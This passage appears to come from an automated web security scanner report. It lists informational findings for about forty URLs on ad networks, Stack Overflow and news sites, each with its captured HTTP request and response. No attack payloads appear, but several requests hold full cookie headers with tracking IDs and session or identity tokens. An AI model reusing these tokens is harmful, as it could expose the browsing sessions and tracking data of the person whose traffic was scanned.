User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 413
Expires: Sun, 30 Jan 2011 12:49:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 30 Jan 2011 12:49:00 GMT
Connection: close
Vary: Accept-Encoding

0rUzZg06AMIpM1+XiWY1NwIngAYgK7AH//ZAbmPZr9i1ivO3AZ99R9fLZRr/n8szkAfACfOLYP8G9I7CGFmFZCu7pBkNS/qR84JtlpczKdd/XBOmGV08ATKb8C2Rh416DfzgYfp5sbkbe0wf1Sg0zUTblr5d4eN7PfFYjtqzdLr88rPZng2NRdk5ksD3UHzdiR9ljpcy
...[SNIP]...

32.45. http://spe.redcated/ds/CJCNTCINGCIN/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spe.redcated
Path:	/ds/CJCNTCINGCIN/

Request

GET /ds/CJCNTCINGCIN/ HTTP/1.1
Host: spe.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 15
Allow: GET
Date: Sun, 30 Jan 2011 01:50:56 GMT
Connection: close

<html>
</html>

32.46. http://spe.redcated/ds/CJCNTCINGCP9/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spe.redcated
Path:	/ds/CJCNTCINGCP9/

Request

GET /ds/CJCNTCINGCP9/ HTTP/1.1
Host: spe.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 15
Allow: GET
Date: Sun, 30 Jan 2011 01:50:56 GMT
Connection: close

<html>
</html>

32.47. http://spe.redcated/ds/DEDENBARCISA/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spe.redcated
Path:	/ds/DEDENBARCISA/

Request

GET /ds/DEDENBARCISA/ HTTP/1.1
Host: spe.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 15
Allow: GET
Date: Sun, 30 Jan 2011 01:50:56 GMT
Connection: close

<html>
</html>

32.48. http://sstatic.net/Js/third-party/jquery.typewatch.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sstatic.net
Path:	/Js/third-party/jquery.typewatch.js

Request

Response

32.49. http://sstatic.net/Js/third-party/openid-jquery.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sstatic.net
Path:	/Js/third-party/openid-jquery.js

Request

Response

32.50. http://sstatic.net/Js/wmd.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sstatic.net
Path:	/Js/wmd.js

Request

Response

32.51. http://sstatic.net/js/master.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sstatic.net
Path:	/js/master.min.js

Request

Response

32.52. http://sstatic.net/js/question.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sstatic.net
Path:	/js/question.js

Request

Response

32.53. http://sstatic.net/openid.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sstatic.net
Path:	/openid.css

Request

Response

32.54. http://sstatic.net/stackoverflow/all.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sstatic.net
Path:	/stackoverflow/all.css

Request

Response

32.55. http://sstatic.net/stackoverflow/img/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sstatic.net
Path:	/stackoverflow/img/favicon.ico

Request

Response

32.56. http://stackoverflow.com/posts/4843433/ivc/3344 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/posts/4843433/ivc/3344

Request

Response

32.57. http://stackoverflow.com/questions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/questions

Request

Response

32.58. http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url

Request

Response

32.59. http://stackoverflow.com/tags previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/tags

Request

Response

32.60. http://stackoverflow.com/users previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/users

Request

Response

32.61. http://stackoverflow.com/users/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/users/login

Request

Response

32.62. http://stackoverflow.com/users/login/global/request previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/users/login/global/request

Request

Response

32.63. http://svtrk.com/vtrk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://svtrk.com
Path:	/vtrk/

Request

GET /vtrk/?id=n5uteh2&utm_source=WP&utm_medium=CPM&utm_term=t10&utm_content=728x90&utm_campaign=ROS HTTP/1.1
Host: svtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:51:07 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Content-Length: 231
Connection: close
Content-Type: text/html

<html>
<head>
<meta http-equiv="refresh" content="0;url='http://www.news5update.com/consumernewsteeth/?id=n5uteh2&utm_source=WP&utm_medium=CPM&utm_term=t10&utm_content=728x90&utm_campaign=
...[SNIP]...

32.64. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl

Request

Response

32.65. http://uac.advertising.com/wrapper/aceUACping.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://uac.advertising.com
Path:	/wrapper/aceUACping.htm

Request

GET /wrapper/aceUACping.htm HTTP/1.1
Host: uac.advertising.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Sun, 30 Jan 2011 01:53:17 GMT
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 01:30:07 GMT
Connection: close
Content-Length: 2659

<html><head></head><body><script type='text/javascript'>
// pingArray['cookieValue'] = ['extra_tag_property_name', 'matching pixel called']
var pingArray = new Array();
pingArray['rm'] = ['rmcpmprice
...[SNIP]...

32.66. http://redcated/APM/iview/139941180/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/APM/iview/139941180/direct

Request

GET /APM/iview/139941180/direct;;wi.728;hi.90/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 1690
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:24:19 GMT

<SCRIPT Language="Javascript">
var DCcode="N4319.msn/B2087123.383;sz=728x90;";
var DCwidth="728";
var DCheight="90";
var randNum = Math.floor(Math.random() * 100000000) + 100000000;
var iframesrc
...[SNIP]...

32.67. http://redcated/APM/iview/148848786/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/APM/iview/148848786/direct

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 1691
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:30:59 GMT

<SCRIPT Language="Javascript">
var DCcode="N4319.MSNMEN/B3889285.6;sz=728x90;";
var DCwidth="728";
var DCheight="90";
var randNum = Math.floor(Math.random() * 100000000) + 100000000;
var iframesr
...[SNIP]...

32.68. http://redcated/BEL/iview/262582811/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/BEL/iview/262582811/direct

Request

GET /BEL/iview/262582811/direct;/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 232
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:27:27 GMT

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/184054348/262582811/direct/01" onclick="(new Image).src='http://t.redcated'"><img src="http://ec.redcated/b/SBBELSHARSBU/MSN
...[SNIP]...

32.69. http://redcated/CNT/iview/286609711/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/286609711/direct

Request

Response

32.70. http://redcated/CNT/iview/287065754/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/287065754/direct

Request

Response

32.71. http://redcated/CNT/iview/299297287/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/299297287/direct

Request

Response

32.72. http://redcated/NYC/iview/264935949/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/NYC/iview/264935949/direct

Request

Response

32.73. http://redcated/ULA/iview/296652509/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/ULA/iview/296652509/direct

Request

GET /ULA/iview/296652509/direct;/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6153
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:19:45 GMT

<html><head><title>flash_300x250_HD_PC_promo</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:
...[SNIP]...

32.74. http://vms.redacted/vms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vms.redacted
Path:	/vms.aspx

Request

GET /vms.aspx HTTP/1.1
Host: vms.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Missing mediaid in the querystring
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:51:41 GMT
Content-Length: 11

Bad Request

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webmail.aol.com
Path:	/$\|http:/travel.aol.com/$\|http:/netscape.aol.com/$\|http:/music.aol.com/radioguide/bb/$\|http:/money.aol.com/$\|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$\|http:/www.weblogs.com/$\|http:/smallbusiness.aol.com/$\|http:/www.blackvoices.com/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Request

GET /$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: webmail.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:51:55 GMT
Content-Length: 11

Bad Request

32.76. http://wrapper.g.redacted/GRedirect.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wrapper.g.redacted
Path:	/GRedirect.aspx

Request

GET /GRedirect.aspx HTTP/1.1
Host: wrapper.g.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:52:07 GMT
Connection: close
Content-Length: 11

Bad Request

32.77. http://www.cannex.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cannex.com
Path:	/

Request

GET / HTTP/1.1
Host: www.cannex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:52:10 GMT
Server: Apache
Last-Modified: Fri, 13 Mar 2009 03:35:20 GMT
ETag: "f27-fa5-49b9d478"
Accept-Ranges: bytes
Content-Length: 4005
Connection: close
Content-Type: text/html

<html>

<head>
<title>Welcome to CANNEX Financial Exchanges Limited</title>
<script language="JavaScript">
<!--
function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p)
...[SNIP]...

32.78. http://www.co2stats.com/propres.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.co2stats.com
Path:	/propres.php

Request

GET /propres.php?s=1138 HTTP/1.1
Host: www.co2stats.com
Proxy-Connection: keep-alive
Referer: http://news.ycombinator.com/news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:47:32 GMT
Server: Apache/2.2.17
Content-Length: 2967
Content-Type: text/html

var co2stats_width = 0, co2stats_height = 0;
if( typeof( window.innerWidth ) == 'number' ) {
//Non-IE
co2stats_width = window.innerWidth;
co2stats_height = window.innerHeight;
} else if( documen
...[SNIP]...

32.79. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hoovers.com
Path:	/business-information/--pageid__13823--/global-mktg-index.xhtml

Request

Response

32.80. http://www.iaventurepartners.com/InformationArbitrage/bcode.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.iaventurepartners.com
Path:	/InformationArbitrage/bcode.swf

Request

GET /InformationArbitrage/bcode.swf HTTP/1.1
Host: www.iaventurepartners.com
Proxy-Connection: keep-alive
Referer: http://www.iaventures.com/InformationArbitrage/main.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Pragma: no-cache
cache-control: no-cache
Content-Type: text/html
Content-Length: 65

<html><head><meta http-equiv="refresh" content="0"></head></html>

32.81. http://www.iaventurepartners.com/LKKpQ/InformationArbitrage/bcode.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.iaventurepartners.com
Path:	/LKKpQ/InformationArbitrage/bcode.swf

Request

GET /LKKpQ/InformationArbitrage/bcode.swf HTTP/1.1
Host: www.iaventurepartners.com
Proxy-Connection: keep-alive
Referer: http://www.iaventures.com/InformationArbitrage/main.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Pragma: no-cache
cache-control: no-cache
Content-Type: text/html
Content-Length: 65

<html><head><meta http-equiv="refresh" content="0"></head></html>

32.82. http://www.json.org/js.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.json.org
Path:	/js.html

Request

GET /js.html HTTP/1.1
Host: www.json.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:47 GMT
Server: Apache
Last-Modified: Thu, 18 Nov 2010 18:57:56 GMT
ETag: "b3-19a4-4ce57734"
Accept-Ranges: bytes
Content-Length: 6564
Connection: close
Content-Type: text/html

<html>
<head>
<title>JSON in JavaScript</title>
<style>
pre {font-family: "Courier New", Courier, mono; margin-left: 40pt}
</style>
</head>
<body bgcolor=linen>
<table width="100%" border="0">
<tr>

...[SNIP]...

32.83. http://www.json.org/json2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.json.org
Path:	/json2.js

Request

GET /json2.js HTTP/1.1
Host: www.json.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:53:41 GMT
Server: Apache
Content-Length: 401
Connection: close
Content-Type: text/html

<html>
<head>
<title>404 NOT FOUND</title>
</head>

<body bgcolor="linen" text="black">
<div style="font-size: 400px; text-align: center;">404</div>
<div style="font-size: 128px; text-align: center; f
...[SNIP]...

32.84. http://www.microsoft.com/library/errorpages/searchMetric.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft.com
Path:	/library/errorpages/searchMetric.html

Request

GET /library/errorpages/searchMetric.html?form=MSERRO&q=resources%20ajax%20jQuery%20jquery%201%203%202%20min%20js HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/library/errorpages/searchMetric.html?form=MSERRO&q=resources%20ajax%20jQuery%20jquery%201%203%202%20min%20js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=de6cd851-c13e-496a-b118-22137b8dc5b1&Microsoft.CreationDate=01/30/2011 14:50:57&Microsoft.LastVisitDate=01/30/2011 14:50:57&Microsoft.NumberOfVisits=1&SessionCookie.Id=699284D5514B373BB0DF32C40A1FD561; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/30/2011 14:50:57&Microsoft.VisitStartDate=01/30/2011 14:50:57&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=2&Microsoft.IdentityToken=v5Wrg5hY0G1ZKTq92W9PB2I2dXUGcRda9bdvn3lRbyw3vtQVr5yKibRJRo344vn/0+gcIZqwCUZupVUxRhccbbSYfclFWlV45y3+IVUoc/VjkW2CxlqI+BKinJOxY8y1lkTlq5kWs6CF3V9Z5Q6o94Ck6jdBc7u2t8CuSL+TAbTnNTyJ3MYpd4KBFZm4Za8S4IvqsfXWsqT1F0ciAHRsLERgadjlrX8XFWgLVhukLjIREUx+k1Tqr+1MZsnlCuY0GyphPKmFlrT72RxmuWrzHhUSFfvfWxUn649vl7e270SMMTDItio1ndIC5dEVOhZe8xd0Qskq/ep2FTBQaRwMNN+kYzj7574EVGUdnNyjc1tSEPiJxjKw8Rj/clSXreouyHXHIrJuzRzX74axWmeyUjTfyMvvqqonr8jGtpMzwOFukpG63L9tBXL/0mSz8FlXS0uSmHuXScgC1XIJcVG8aWoTnKpZPxIXPVGPh63/vmCnYYUJ3Nxe0yHa3BTDjlef5DOBN0JSNIAp3+N0oVL6SUjutOcU+950gT6kex7wcLk=&Microsoft.MicrosoftId=0237-9950-5424-5770; MS0=864ee6b5e2b44b9cadb6502b2d8e8c54; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1296391913882:ss=1296391908891

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/html
Last-Modified: Fri, 13 Jun 2008 16:29:48 GMT
Accept-Ranges: bytes
ETag: "06637b272cdc81:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
VTag: 438166642500000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 14:50:57 GMT
Content-Length: 437

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head>
<title>ErrorSearch
...[SNIP]...

32.85. http://www.msnbc.redacted/html/HtmlSitemap0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/html/HtmlSitemap0.html

Request

GET /html/HtmlSitemap0.html HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 19 Nov 2009 18:33:34 GMT
ETag: "013eacc4669ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:11:04 GMT
Content-Length: 107
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted

<html>
<body>
<meta http-equiv="refresh" content="0;url=/html/msnbc/HtmlSitemap0.html">
</body>
</html>

32.86. http://www.spacedaily.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.spacedaily.com
Path:	/

Request

GET / HTTP/1.1
Host: www.spacedaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

32.87. http://www.thespacereview.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thespacereview.com
Path:	/

Request

GET / HTTP/1.1
Host: www.thespacereview.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

32.88. http://www.tigerdirect.com/cgi-bin/icart.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tigerdirect.com
Path:	/cgi-bin/icart.asp

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.webmd.com
Path:	/$\|wonderwall.redacted\|msn.com/wonderwall\|v14.msn.com/\|preview.redacted/\|www.redacted/preview.aspx\|mtv.com/videos/\|mtv.com/

Request

GET /$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
Date: Sun, 30 Jan 2011 02:04:07 GMT
Connection: close

